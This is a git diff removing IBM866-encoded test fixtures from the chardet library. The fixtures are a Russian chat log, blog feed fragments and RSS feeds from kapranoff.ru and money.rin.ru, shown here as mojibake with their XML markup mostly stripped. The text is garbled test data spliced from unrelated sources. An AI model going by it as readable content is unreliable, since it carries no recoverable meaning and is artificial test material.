    Fallen_Angel (10:36 PM) :
    םג® ¡כ«  ¬®ן בד₪ל¡ ...
    Fallen_Angel (10:36 PM) :
    ן םג® ג × §­ מ....
    Fallen_Angel (10:36 PM) :
    ¡¥§ £ ₪ ­¨© ­ ¢¥א­ן× ...
    Xxxx (10:36 PM) :
    ­¥ ¢ ¦­®..
     §®¢¥¬ ¯א®בג® «מ¡¨¬כ¬ ח¥«®¢¥×®¬
    Fallen_Angel (10:37 PM) :
    §­ ¥טל, ן גכבןחד א § £®¢®א¨«  §  4 £®₪  "«מ¡«מ"
      £«ד¡¨­ד ב¬כב«  ®ב®§­ « , ג®«ל×® ×®£₪  ®­  ¨בח¥§«  ב ¬®¥© ¦¨§­¨....
    ג × בגא ­­®...
    Xxxx (10:39 PM) :
    ג®£₪  «מ¡¨ ₪ «לט¥, «מ¡¨ ¢ב¥£₪ ,
    ¢¥₪ל ­ בג®ןי ן «מ¡®¢ל ­¥ גא¥¡ד¥ג ­ £א ₪כ ¨ ¯®®יא¥­¨ן
    Fallen_Angel (10:40 PM) :
    ¯¥א¢כ© ח¥«®¢¥×, ×®ג®אכ© ¯®­ן«, חג® ן «מ¡«מ ¥¥ ­¥ ב¬®גאן ­¨ ­  חג®!
    ¢ב¥ ₪אד£¨¥ £®¢®אןג- § ¡ד₪ל, ­ חג¨ ¦¨§­ל § ­®¢® ¨ ג.₪.:-(
    ן ג × ב×דח מ ¯® ­¥©...
    -
    Fallen_Angel (10:41 PM) :
    ן ג × ­¥ ¬®£ד א §¬¥­ןגלבן ­  «¨ז , ¢ ×®ג®אכו ­¥ג ¥¥...
    Fallen_Angel (10:42 PM) :
    ®­  § × § «  ¬¥­ן ¢ ז¥«¨ג¥«ל­¨זכ, חג®¡כ ¬¥­ן ¢כ«¥ח¨«¨ ®ג ­¥¥...
    Fallen_Angel (10:43 PM) :
    חג®¡כ ן § ¡כ« , חג®¡כ ¬­¥ ­¥ ¡כ«® ג × ¡®«ל­®...
    Fallen_Angel (10:43 PM) :
    ®­  ­¥ ¯®­¨¬ ¥ג...
    Xxxx (10:43 PM) :
     י¥ג ‹¨«¨ג- םג® ח¥א­ ן «ד­ 
    ג × ¦¥ ב×דח מ ®¡ דגא ח¥­­®¬ ¬­®© ח¥«®¢¥×¥, ­® ¬­¥ ­¨ח¥£® ­¥ ®בג ¥גבן, × × ג®«ל×® ¬®«¨גלבן ® ­ס¬...
    -
    Xxxx (10:45 PM) :
    ‡­ ©, חג® ­¨× × ן ¡®«ל ­¥ ₪«¨גלבן ¢¥ח­®.
    Fallen_Angel (10:45 PM) :
    §­ ¥טל, ¬¨א בג ­®¢¨גבן ג × ¡¥§ב¬כב«¥­, £אד¡ ¨ ­¥¢כ­®ב¨¬, ×®£₪  ¯א®¨בו®₪ןג ¢¥י¨ ¢א®₪¥ םג¨ו...
    Fallen_Angel (10:45 PM) :
    ן ¡ א ­...¢¥א­¥¥ ג¥«¥ז א®¦₪¥­­כ© ¢ £®₪ ¡כ× ...ד ¬¥­ן םג® ד¦¥ ב ה¥¢א «ן ¬¥בןז ...
    Fallen_Angel (10:47 PM) :
    ן ¯א®בג® ¨£א מ ¢ ט®ד : ב ¬ד ב¥¡ן בח בג«¨¢דמ ­  «מ₪ןו...
    ₪®¬®© ¢®§¢א י גלבן ¯א®בג® ­¥¢כ­®ב¨¬®....
    Fallen_Angel (10:48 PM) :
    ®­  ®בג ¢¨«  ¢ב¥ ג®, חג® ג × «מ¡¨« ...
    Xxxx (10:48 PM) :
    ¯א®בג® ד«כ¡­¨בל,
    ¥ב«¨ גכ «מ¡¨טל, ₪®«¦¥­ ¡כגל ב¢¥ג, «מ¡¢¨ ­¥ ¡כ¢ ¥ג ¡¥§ ב¢¥ג , ₪ ¦¥ ¥ב«¨ ¡®«ל­®
    Xxxx (10:49 PM) :
    ¨ ב× ¦ד ג¥¡¥ ­  דט×®:
    ‚‘’•ˆ‘ ¨ ¯¥א¥בג ­ל ב¥¡ן ¦ «¥גל
    Fallen_Angel (10:49 PM) :
    ן o'k... ן ¢ ב ¬®¬ ₪¥«¥ ד«כ¡ מבל: ן א ₪  × ¦₪®¬ד ב®«­¥ח­®¬ד\₪®¦₪«¨¢®¬ד ₪­מ...
    «מ¡®© ¬¥«®ח¨, ­® םג® ¢ב¥ ­¥ ג® ¡¥§ ­¥¥: ן ¯ א ««¥«ל­® ¦¨¢ד ב ¬  ב ב®¡®©...ן ­¥ §­ מ × × םג® ®¡לןב­¨גל...
    ­¨×ג® ב¥¡ן ­¥ ¦ «¥¥ג...
    Fallen_Angel (10:50 PM) :
    ד ¬¥­ן ¢ב¥ ¥בגל, ן  ¡ב®«מג­® ב ¬®₪®בג ג®ח­כ© ח¥«®¢¥×...¬­¥ ­¨ח¥£® ­¥ ­ ₪® ¡¥§ ¨¬¥­­® ­¥¥...
    Xxxx (10:51 PM) :
    ¥בגל ט ­ב, חג® ®­  ¢¥א­סגבן?
    Fallen_Angel (10:52 PM) :
    ­¥ §­ מ, ®­  £®¢®א¨ג, חג® «מ¡¨ג ¬¥­ן. ­® ד¦¥ ¯®-₪אד£®¬ד...
    ן ­¥ ¢¥אמ ­¨ ¥₪¨­®¬ד ¥¥ ב«®¢ד...¢ב¥£® ג × ¬­®£®, חג® ¬®¦­® ¯¨ב גל ¡¥בגב¥««¥א...
    Fallen_Angel (10:53 PM) :
    ®­  ¯א®בג® ב¯ «¨« בל. ן ¯א®בג® ¬®£«  ­¨ח¥£® ­¥ ד§­ גל, ¬®¦¥ג ¡כגל ®­  ¡כ ₪ ¦¥ ב¥©ח ב ¡כ«  ¡כ ₪®¬ ...
    ¨­®£₪  ן ₪ד¬ מ, בג®¨«® «¨ ¬­¥ «¥§גל ¢ ¥¥ ×®¬¯...
    Fallen_Angel (10:53 PM) :
    ¢¥א­¥¥ ¢ ¬®©, ×®ג®אכ¬ ®­  ¯®«ל§®¢ « בל....
    Fallen_Angel (10:54 PM) :
    ¯®ג®¬, ®­  ₪­ן¬¨ ¬®¦¥ג ­  ¡א גל ב®ג®¢כ©...
    Fallen_Angel (10:55 PM) :
    ¯®ג®¬ ¯א®בג® ¯®§¢®­¨גל ¨ ב¯א®ב¨גל × × ד ¬¥­ן ₪¥« ?:-)
    Fallen_Angel (10:55 PM) :
    ¬¥­ן ­ ח¨­ ¥ג ׫¨­¨גל ג ×, חג® ן ­¥ ¬®£ד ב× § גל ¨ ב«®¢ ...
    Fallen_Angel (10:56 PM) :
    ®­  ג®£₪  ד¡¥¦₪ ¥גבן. חג® ¥© ­¥ בג®¨«® §¢®­¨גל ....¡א¥₪...
    ן ו®חד ₪אד£®© £«®¡דב....
    Xxxx (10:56 PM) :
    ¢ ¬ ­ ₪® א §®¡א גלבן ¬¥¦₪ד ב®¡®©,
    ¬­¥ ¡®«לט¥ ­¥ח¥£® ב× § גל ...
    -
    Fallen_Angel (10:56 PM) :
    ¯® ¨₪¥¥ ®­  ¡ד₪¥ג ¦¨גל ¢ ג¢®¥¬ £®א®₪¥...
    Fallen_Angel (10:57 PM) :
    ¬כ בג® א § א §¡¨א «¨בל...®­  «מ¡¨ג ­ ב ₪¢®¨ו...םג®£® ×€§«  ¨ ¬¥­ן...
    Fallen_Angel (10:58 PM) :
    חד¢בג¢® ¢¨­כ ¬¥ט ¥ג ¥© ¢¥א­דגלבן: ®­  ₪ד¬ ¥ג, חג® א ­® ¨«¨ ¯®§₪­® ¨¬¥­­® ¨§=§  םג®£® ¬כ ¢ ¨ג®£¥ א §®©₪¥¬בן...
    Fallen_Angel (10:59 PM) :
    §­ ¥טל, ן ¯®§¢®­¨«  ¥£® א®₪¨ג¥«ן¬ ¢ ...
    Fallen_Angel (11:00 PM) :
    ¬­¥ ג × ¢ ¦­® ¡כ«® §­ גל, × × ®­¨ ®ג­®בןגבן × ג®¬ד, חג® ¨ו בכ­ "¢®§¦¥« « ¦¥­ד ¡«¨¦­¥£® ב¢®¥£®" §­ ן ® ג®¬, × × םג®ג ¡«¨¦­¨© בגא ₪ ¥ג ®ג םג®£®, ¨ §­ ¥טל חג®?
    Fallen_Angel (11:04 PM) :
    ¥£® ¬ ¬®ח×  ¨ב¯ד£ « בל, ¯®§¢ «  ¯ ¯®ח×ד, ¯ ¯  ב ¬ ג ¬¨ ¬¥­ן ¯®ב« « ¨ ב× § «, חג® ®­ בג® א § ¢« §¨« ¢ חד¦¨¥ ¦¨§­¨ ¨ ג®«ל×® £®א₪¨גבן םג¨¬, ¯®ב®¢¥ג®¢ « ¬­¥ ¯א®גא¥§¢¥גל, ו®גן ן ­¥ ¯למ ¢®®¡י¥...­ד, ¢ ®¡י¥¬ †¥­ל×  ¢ ו®א®ט¨ו אד× ו...
    Fallen_Angel (11:04 PM) :
    םג¨ «מ₪¨ ב ¬¨ ₪¥« מג םג®ג ¬¨א ג ×¨¬ ­¥¢כ­®ב¨¬כ¬...
    -
    -false -
    - - - - -lucky - -2005-07-11T00:11:33+03:00 -2005-07-10T21:11:33Z -2005-07-10T21:11:33Z - -tag:blogger.com,1999:blog-11182692.post-112102989342403583 -‘¯¨ב®× בח בג«¨¢ח¨×  - -
    ז¨­¨§¬ -
    ם£®¨§¬ -
    ב¨«ל­®¥ ד₪®¢«¥ג¢®א¥­­®¥ ¦¥« ­¨¥ ב¥×ב  (­¥«מ¡¢¨) -
     ב®ז¨ «ל­®בגל -
    חא¥§¬¥א­כ¥ גא¥¡®¢ ­¨ן × ¡«¨§×¨¬ -
    ®¦¥בג®חס­­®¥ א ¢­®₪דט¨¥ × ®×אד¦ מי¨¬ -
    ו ®ג¨ח­®בגל ¨ ¯¥א¥¬¥­ח¨¢®בגל ¯®¡ד¦₪¥­¨© -
    ®גבדגבג¢¨¥ בה®א¬¨א®¢ ­­כו ¬®א «ל­כו דבג ­®¢®× -
    ¡¥בב¨«ל­®¥ ¡¥§א §«¨ח¨¥ × ¢כט¥¯¥א¥ח¨ב«¥­­®¬ד -
    -
     × ג®«ל×® ן ¢כר₪כ¢ מ ח¥«®¢¥×  ¨§ ב¢®¥© ¦¨§­¨ ...®­ ¯®ן¢«ן¥גבן..:) -
    ¨ ¢ב¥ ­ ח¨­ ¥גבן ב­®¢ :)כ ח בג® ®גא¥× ¥¬בן ®ג ×®£®-ג®, ®גא¥§ ¥¬ בא §ד, ₪ד¬ ן, חג® ג × ¬¥­לט¥ ¡®«¨.כ § ×אכ¢ ¥¬ ₪¢¥א¨ ­ £«דו®,× × ×¨א¯¨ח­ ן בג¥­  ¨«¨ ¯כג ¥¬בן ד× § גל ­  ­¥¥ × × ¡ד₪ג® ¢ ­¥¥ ¬®¦­® ¢כ©ג¨. -
    כ דו®₪¨¬ ¨ ­¥ ®¡®א ח¨¢ ¥¬בן, ו®גן ­  ב ¬®¬ ₪¥«¥ ¥יס ₪®«£® ¬כב«¥­­® ג ¬ ­ ו®₪¨¬בן. -
    ’י¥ג­® ¯כג ¥¬בן ®ג®א¢ גלבן ®ג ג¥­¨, ­® ¯®­¨¬ ¥¬, חג® ®ג ­¥ס ­¥ ¨§¡ ¢¨גלבן, ¬®¦­® «¨טל ­¥ ®¡א י גל ¢­¨¬ ­¨ן ­  ­¥ס ¨«¨ ¯®©¬ גל ­®¢דמ.. -
    × × ¯®­א ¢¨גבן....א®ט«®¥ ¯א®בג¨גל ב ¯®ב«¥₪דמי¨¬ § ¡¢¥­¨¥¬... -
    ¨«¨ -
    ¨×®£₪  ­¥ ¡כגל ¯א®י¥­­כ¬.. ­® ¨ ¢¥ח­® ­¥ § ¡כגכ¬... -
    ¨ ­¥ ¯א®בג¨גל ¨ ¢¥ח­® ­¥ § ¡כגל...ˆ ­¨×®£₪  ¡®«לט¥ ­¥ § ¡®«¥גל ­¥¨§«¥ח¨¬®© ¡®«¥§­למ, × ×®ג®א®© ד¦¥ ¢כא ¡®ג ­ בג®©×¨© ¨¬¬ד­¨ג¥ג, ¨₪ג¨ ¯® ¦¨§­לן¬ ­®¢כו ג¥­¥© ב×®«ל§ן ¨ ­¥ ב¢ן§ ­® ¡«¨§×®,¯®­¨¬ ן, חג® ­¨ח¥£® ג ×®£® ­¨ ¢ ×®¬ ­¥ג, × × םג®£® ­¥ ¡כ«® ¨ ₪® םג®£®, ¢ב¥ ¯א¨₪ד¬ ­® ¨ ¨₪¥ «¨§¨א®¢ ­® ¯א®בג® ¢ ¬®§£ ו.®§£ ח¥«®¢¥×  ₪® ב¨ו ¯®א ¢®בל¬®¥ חד₪® ב¢¥ג ,ג¥¬ ¡®«¥¥ ¬®¨. -
    -
    -
    -false -
    -
    diff --git a/chardet/tests/IBM866/kapranoff.ru.xml b/chardet/tests/IBM866/kapranoff.ru.xml deleted file mode 100644 index d00a897..0000000 --- a/chardet/tests/IBM866/kapranoff.ru.xml +++ /dev/null @@ -1,161 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -¯ד«מ¬-¯ד«מ¬ -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -”®«ל׫®א -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[€ ¢כ £®¢®א¨ג¥ — ₪­¥¢­¨×¨...]]> -http://kapranoff.ru/archives/003661.html -“­¨× «ל­כ©, ­  ¬®© ¢§£«ן₪, ¯א®₪ד×ג ×®««¥×ג¨¢­®£® ג¢®אח¥בג¢ . ­¨£  ז¥« ן. ¥ ¯®¦ «¥¥ג¥. ®טר ¬כט×®©. ₪­ ¦₪כ ב®«­¥ח­®© ¯®א®©, כ« ₪¥­ל ₪®¦₪«¨¢ ¨... - -kappa -2003-12-17T16:54:58+03:00 - - -דם­₪®«¨­  -http://kapranoff.ru/archives/003660.html -דבבר© ב ©ג ® £ד¡­כו £ א¬®ט× ו ¨ ¨£א¥ ­  ­¨ו.  ©ה. „ ¢­® ו®ג¥« ­ ¯¨ב גל ® ­ס¬, ₪  ¢®ג § ¡כ¢ « ¢בס. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -× ¬¡ם× -http://kapranoff.ru/archives/003659.html -‡₪א בג¥ ¢ ¬ ב ו¢®בג¨×®¬. ¬®£ ¡כ ¬­®£® ­ ¯¨ב גל ® ג®¬, ח¥¬ § ­¨¬ «בן ¢במ םגד ­¥₪¥«מ. ­¥ «¥­ל. ¢ח¨­×  ­¥... - -kappa -2003-12-17T13:42:39+03:00 - - -¥¬ ¡כגל? -http://kapranoff.ru/archives/003657.html -‘¡א¥­₪¨«, ¢¨₪¨¬®, ¢ ט ¯®×®א­כ© ב ד¬  ב®¢ב¥¬ ®ג ¡¥§₪¥«לן. ‘¨¦ד ¢®ג, גא חד ¡¥§ד¬­כ¥ ₪¥­ל£¨ ¢ ¡אן­ב×®¬ ¨­ג¥א­¥ג¥, ¯א®ו®¦ד ג¥בגכ ­ ... - -kappa -2003-12-13T12:15:13+03:00 - - -„¥­ל ×®­בג¨גדז¨¨ -http://kapranoff.ru/archives/003656.html -—¥«®¢¥ח¥×, ×®ג®אכ© ב₪¥« « ¬¥­ן ¬¥«®¬ ­®¬, ב¥£®₪­ן ®ג¬¥ח ¥ג ב¢®ס ₪¥­לא®¦₪¥­¨¥ :) “א , ן ג × ¯®« £ מ, ₪  ¢¥₪ל? ®ב¢ןי מ ¥© ¢כו®₪ ¢ג®א®£®... - -kappa -2003-12-12T15:18:10+03:00 - - -«כג₪כ¡א -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -‘ ¬®¥ ®­® -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -‘¯®אג-×ב¯א¥בב ב®®¡י ¥ג -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -‡¥¬«ן­¥-3 -http://kapranoff.ru/archives/003653.html - „¥¢®ח×  ¨ ₪ « ©-« ¬ . ƒ¥­¨ «ל­®. ‡₪¥בל ¢בס.... - -kappa -2003-12-05T13:34:08+03:00 - - -ד§כ×  ב ­ ¬¨ -http://kapranoff.ru/archives/003652.html - ד¯¨« ¢®ג. ®א ₪®¢ « בג א¨× . ‘¥¡ן.... - -kappa -2003-12-04T19:56:54+03:00 - - -®¢®בג¥­ל -http://kapranoff.ru/archives/003651.html -€ דב גכ© ¥¢ןר­ ב® ג®¢ א¨י¨ § × ­ח¨¢ ¥ג § ¯¨בל ­®¢®£®  «ל¡®¬ . ‚ בד¡¡®גד ®­¨, ×בג ג¨, ¡ד₪דג ¢ –„•. ¬®¦¥ג ¡כגל בו®¦ד.... - -kappa -2003-12-04T18:58:46+03:00 - - -‘¨­¨© ¢®«, ¨ב¯®«­¥­­כ© ®ח¥© -http://kapranoff.ru/archives/003650.html -ƒ ® ¢בן×®¬ א §­®¬. ®©¬¨ג¥, ¥בגל ן, ן ¯¨טד ¯¥ב­¨, ן ¨ו ¯®מ, ד ¬¥­ן ¥בגל ב¢®ן םבג¥ג¨× . ˆ ¥בגל... - -kappa -2003-12-03T22:44:54+03:00 - - -¢¦¨×-¢¦¨× -http://kapranoff.ru/archives/003649.html -€ ן, ¬¥¦₪ד ג¥¬, ¢¥א­ד«בן ¨§ אן­ב× . ’ ×¨¥ ₪¥« .... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/IBM866/money.rin.ru.xml b/chardet/tests/IBM866/money.rin.ru.xml deleted file mode 100644 index dc9e5a5..0000000 --- a/chardet/tests/IBM866/money.rin.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - -×®­®¬¨×  ¨ ה¨­ ­בכ -http://money.rin.ru -×®­®¬¨ח¥בר¥ ¨ ה¨­ ­ב®¢כ¥ ­®¢®בג¨ -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -‘ˆ’…‘ ­¥ דג¢¥א₪¨«  ×¢®גכ ­  ם×ב¯®אג ח¥א­®© ¨×אכ ¨ ®ב¥גא®¢כו -http://money.rin.ru/content/news/?id=106325&from=rss -‘¥×א¥ג א¨ ג ®­¢¥­ז¨¨ ® ¬¥¦₪ד­ א®₪­®© ג®א£®¢«¥ ₪¨×¨¬¨ ¢¨₪ ¬¨ ה ד­כ ¨ ה«®אכ, ­ ו®₪ןי¨¬¨בן ¯®₪ ד£א®§®© ¨בח¥§­®¢¥­¨ן (‘ˆ’…‘), § ן¢¨« ¢® ¢ג®א­¨×, חג® ­¥ ב¬®¦¥ג דג¢¥א₪¨גל ×¢®גכ ­  ם×ב¯®אג ח¥א­®© ¨×אכ ¨ ®ב¥גא®¢כו ­  2006 £®₪ ₪® ג¥ו ¯®א, ¯®×  בגא ­כ-¯א®¨§¢®₪¨ג¥«¨ ­¥ ¯א¥₪®בג ¢ןג ¯®«­דמ ¨­ה®א¬ ז¨מ ® ב®בג®ן­¨¨ ¯®¯ד«ןז¨¨ ®ב¥גא®¢כו. - - - -‚¢¥₪¥­ ¬¥¦₪ד­ א®₪­כ© § ¯א¥ג ­  ם×ב¯®אג ח¥א­®© ¨×אכ -http://money.rin.ru/content/news/?id=106324&from=rss -‚¢¥₪¥­ ¬¥¦₪ד­ א®₪­כ© § ¯א¥ג ­  ם×ב¯®אג ח¥א­®© ¨×אכ.  × ¯¥א¥₪ ¥ג "ו® ®ב×¢כ", םג® א¥ט¥­¨¥ ¯א¨­ןג® ¢ †¥­¥¢¥ ­  § ב¥₪ ­¨¨ ¬¥¦₪ד­ א®₪­®© ®א£ ­¨§ ז¨¨ ¯® ג®א£®¢«¥ £א®§ןי¨¬¨ ¨בח¥§­®¢¥­¨¥¬ ¢¨₪ ¬¨ ה«®אכ ¨ ה ד­כ (CITES). - - - -א®¡«¥¬  ¯א®ו®¦₪¥­¨ן £א ­¨זכ גדא¨בג¨ח¥בר¬¨  ¢ג®¡דב ¬¨, ב«¥₪דמי¨¬¨ ¨§ ®בב¨¨ ¢ …¢א®¯ד, א¥ט¥­  -http://money.rin.ru/content/news/?id=106323&from=rss -א®¡«¥¬  ¯א®ו®¦₪¥­¨ן £א ­¨זכ גדא¨בג¨ח¥בר¬¨  ¢ג®¡דב ¬¨, ב«¥₪דמי¨¬¨ ¨§ ®בב¨¨ ¢ …¢א®¯ד, א¥ט¥­ .  × ב®®¡י¨«¨ ¢ ®בב¨©ב×®¬ ב®מ§¥ גדא¨­₪דבגא¨¨, ב 1 ן­¢ אן 2006£. ¢ ¥«®אדבב¨¨ ®ג¬¥­ןמגבן ¢ב¥ ¬¥בג­כ¥ ב¡®אכ ¯א¨ ¯¥א¥ב¥ח¥­¨¨ £א ­¨זכ. - - - -דג¨­ ¯®₪¯¨ב « § ×®­ ® ¢­¥ב¥­¨¨ ¨§¬¥­¥­¨© ¢ ’ ¬®¦¥­­כ© ×®₪¥×ב ” -http://money.rin.ru/content/news/?id=106322&from=rss -א¥§¨₪¥­ג ®בב¨¨ ‚« ₪¨¬¨א דג¨­ ¯®₪¯¨ב « ה¥₪¥א «ל­כ© § ×®­ " ¢­¥ב¥­¨¨ ¨§¬¥­¥­¨© ¢ בג גל¨ 147 ¨ 388 ’ ¬®¦¥­­®£® ×®₪¥×ב  ®בב¨©ב×®© ”¥₪¥א ז¨¨", ¯א¨­ןגכ© ƒ®ב₪ד¬®© 23 ₪¥× ¡אן ¨ ®₪®¡א¥­­כ© ‘®¢¥ג®¬ ”¥₪¥א ז¨¨ 27 ₪¥× ¡אן 2005 £®₪ . - - - -"ƒ€‡" …€’ˆ‹ ‘’€‚ˆ ƒ€‡€ € “€ˆ“ -http://money.rin.ru/content/news/?id=106321&from=rss -‘¥£®₪­ן ­ ח¨­ ן ב 10.00 ¢ ב¢ן§¨ ב ®ג× §®¬ €" הג®£ § “×א ¨­כ" ®ג ¯®₪¯¨ב ­¨ן ×®­גא ×ג  ­  ¯®בג ¢×ד £ §  ¢ 2006 £®₪ד, €"ƒ §¯א®¬" ¯א¥×א ג¨«® ¯®בג ¢×ד £ §  ¯®גא¥¡¨ג¥«ן¬ “×א ¨­כ. ‘®®ג¢¥גבג¢דמי¥¥ ¯א¥₪ד¯א¥¦₪¥­¨¥ ¡כ«® ®ה¨ז¨ «ל­® ­ ¯א ¢«¥­® ד×א ¨­ב×®© בג®א®­¥ 31 ₪¥× ¡אן 2005 £®₪ . - - - -‚¢®₪ןגבן ­®¢כ¥ ¯א ¢¨«  ¯¥א¥ב¥ח¥­¨ן £א ­¨ז ב® בגא ­ ¬¨  «ג¨¨ -http://money.rin.ru/content/news/?id=106320&from=rss -ˆ§¬¥­¥­¨ן ¢ ¯®אן₪×¥ ¯¥א¥ב¥ח¥­¨ן £א ­¨ז ב® בגא ­ ¬¨  «ג¨¨ ¢¢®₪ןגבן ב 1 ן­¢ אן 2006 £®₪ .  × ב®®¡י¨«¨ ˆ€ ®¢®בג¨ ¢ ˆ„ ®בב¨¨, ¯א¨ גא ­§¨ג¥ ח¥א¥§ ג¥אא¨ג®א¨מ ‹¨ג¢כ ¢  «¨­¨­£א ₪ב×דמ ®¡« בגל ¨ ¨§ ®¡« בג¨ ב 2006 £®₪  ¯א¥×א י ¥גבן ₪¥©בג¢¨¥ § £א ­¨ח­®£® ¯ ב¯®אג  ‘‘‘. - - - -‘ 1 ן­¢ אן ¢בגד¯ ¥ג ¢ ב¨«ד § ×®­ ®¡ ®ב®¡כו ם×®­®¬¨ח¥ברו §®­ ו -http://money.rin.ru/content/news/?id=106319&from=rss -‘ 1 ן­¢ אן ¢בגד¯ ¥ג ¢ ב¨«ד § ×®­ ®¡ ®ב®¡כו ם×®­®¬¨ח¥ברו §®­ ו (‡), ¯א¥₪דב¬ גא¨¢ מי¨© ג ¬®¦¥­­כ¥ ¨ ­ «®£®¢כ¥ «ל£®גכ ₪«ן א¥§¨₪¥­ג®¢ םג¨ו §®­. ‘®£« ב­® § ×®­ , ¢ ®בב¨¨ ¡ד₪דג ב®§₪ ­כ ‡ ₪¢דו ג¨¯®¢: ¯א®¬כט«¥­­®-¯א®¨§¢®₪בג¢¥­­כ¥ ¨ ג¥ו­¨×®-¢­¥₪א¥­ח¥בר¥. - - - -”¥₪¥א «ל­ ן ג ¬®¦¥­­ ן ב«ד¦¡  ¢ 2005 £®₪ד -http://money.rin.ru/content/news/?id=106318&from=rss -®¯®«­¥­¨¥ ₪®ו®₪­®© ח בג¨ ה¥₪¥א «ל­®£® ¡מ₪¦¥ג  ®בג ¢ «®בל ®₪­¨¬ ¨§ ¢ ¦­¥©ט¨ו ­ ¯א ¢«¥­¨© ₪¥ןג¥«ל­®בג¨ ג ¬®¦¥­­®© ב«ד¦¡כ ®בב¨¨. ‚ 2005 £., ¯® ¯א¥₪¢ א¨ג¥«ל­כ¬ ₪ ­­כ¬, ג ¬®¦¥­­כ¬¨ ®א£ ­ ¬¨ ¯¥א¥ח¨ב«¥­® ¢ ₪®ו®₪ ה¥₪¥א «ל­®£® ¡מ₪¦¥ג  2 גא¨««¨®­  102,2 ¬¨««¨ א₪  אד¡«¥©, חג® ב®בג ¢¨«® 103% ®ג ×®­גא®«ל­®£® § ₪ ­¨ן. - - - -‹מ¡כ¥ ¯« ­כ ¯® ¯«¥חד -http://money.rin.ru/content/news/?id=106317&from=rss -‘ ו®א®ט¨¬ ­ בגא®¥­¨¥¬ ¢בגא¥ח מג ®¢כ© £®₪ ג ¬®¦¥­­¨×¨ „ «ל­¥£® ‚®בג®× . „«ן םג®£® ¥בגל ו®א®ט¨© ¯®¢®₪ - ₪¥× ¡אלבר© ¯« ­ ¯® ב¡®אד ג ¬®¦¥­­כו ¯« ג¥¦¥© ¢כ¯®«­¥­ ¨¬¨ ­  115 %. ‚ ה¥₪¥א «ל­כ© ¡מ₪¦¥ג ¯¥א¥ח¨ב«¥­® 9 ¬«א₪. - - - -®­בד«לג ג¨¢­כ© ב®¢¥ג א¥ט ¥ג ¨ ­¥¡®«לט¨¥ ¢®¯א®בכ, ¨ ×®­ז¥¯גד «ל­כ¥ ¯א®¡«¥¬כ -http://money.rin.ru/content/news/?id=106316&from=rss -® ב®®¡י¥­¨מ ¯א¥בב-ב«ד¦¡כ ’“ ”, ®ח¥א¥₪­®¥ § ב¥₪ ­¨¥ ®­בד«לג ג¨¢­®£® ב®¢¥ג  ¯® א ¡®ג¥ ב דח בג­¨× ¬¨ ‚„ ¯א¨ ¦­®¬ ג ¬®¦¥­­®¬ ד¯א ¢«¥­¨¨ ב®בג®ן«®בל ¢ ₪¥× ¡א¥ ­  ¡ §¥ "’ £ ­א®£בר©  ¢ג®¬®¡¨«ל­כ© § ¢®₪". - - - -®««¥£¨ן ”’‘ ®בב¨¨ א בב¬®גא¥«  ¢®¯א®בכ ¯®₪£®ג®¢×¨ « ­  ₪¥©בג¢¨© ¯® א¥ «¨§ ז¨¨ ®­ז¥¯ז¨¨ א §¢¨ג¨ן ג ¬®¦¥­­כו ®א£ ­®¢ ®בב¨©ב×®© ”¥₪¥א ז¨¨ -http://money.rin.ru/content/news/?id=106315&from=rss -29 ₪¥× ¡אן 2005 £®₪  ב®בג®ן«®בל § ב¥₪ ­¨¥ ×®««¥£¨¨ ”¥₪¥א «ל­®© ג ¬®¦¥­­®© ב«ד¦¡כ ®בב¨¨, ­  ×®ג®א®¬ ¡כ«¨ א בב¬®גא¥­כ ¢®¯א®בכ ¢כא ¡®גר ¯« ­  ¬¥א ¯® א¥ «¨§ ז¨¨ ®­ז¥¯ז¨¨ א §¢¨ג¨ן ג ¬®¦¥­­כו ®א£ ­®¢ ®בב¨©ב×®© ”¥₪¥א ז¨¨ ­  2006-2010 £®₪כ, ®₪®¡א¥­­®© א ¢¨ג¥«לבג¢®¬ ®בב¨©ב×®© ”¥₪¥א ז¨¨ 8 ₪¥× ¡אן ב.£. - - - - ¢בגד¯«¥­¨¨ ¢ ב¨«ד ¯®בג ­®¢«¥­¨ן א ¢¨ג¥«לבג¢  ” " א¥£ד«¨א®¢ ­¨¨ ¨¬¯®אג  £®¢ן₪¨­כ ¬®א®¦¥­®© ¢ 2006 £®₪ד" -http://money.rin.ru/content/news/?id=106314&from=rss -‘ 1 ן­¢ אן 2006 £®₪  ¢בגד¯ ¥ג ¢ ב¨«ד ¯®בג ­®¢«¥­¨¥ א ¢¨ג¥«לבג¢  ” N 729 ®ג 5.12.2005 £. " א¥£ד«¨א®¢ ­¨¨ ¨¬¯®אג  £®¢ן₪¨­כ ¬®א®¦¥­®© ¢ 2006 £®₪ד ". ‘®£« ב­® ¯®בג ­®¢«¥­¨מ, ¬¥­ןמגבן ­ ¨¬¥­®¢ ­¨ן גא¥ו ¯®₪בד¡¯®§¨ז¨© ’ ‚„ (0202 30 100 3, 0202 30 500 3 ¨ 0202 30 900 3), ¢ ×®ג®אכ¥ ¢×«מח ¥גבן דב«®¢¨¥ הא ­×®-£א ­¨זכ בגא ­כ ¢¢®§ ,   ג ×¦¥ דבג ­ ¢«¨¢ מגבן ­®¢כ¥ בג ¢×¨ ¢¢®§­כו ¯®ט«¨­ ב®£« ב­® ¯א¨«®¦¥­¨מ. - - - -¢®גכ ­  ¨¬¯®אג ¡ד₪דג ¨ב¯®«ל§®¢ ­כ ¯®«­®בגלמ -http://money.rin.ru/content/news/?id=106313&from=rss -‘ 1 ן­¢ אן ¢בגד¯ ¥ג ¢ ב¨«ד ¯®בג ­®¢«¥­¨¥ א ¢¨ג¥«לבג¢  ” " ₪®¯®«­¨ג¥«ל­כו ¬¥א ו ¯® א¥£ד«¨א®¢ ­¨מ ¨¬¯®אג  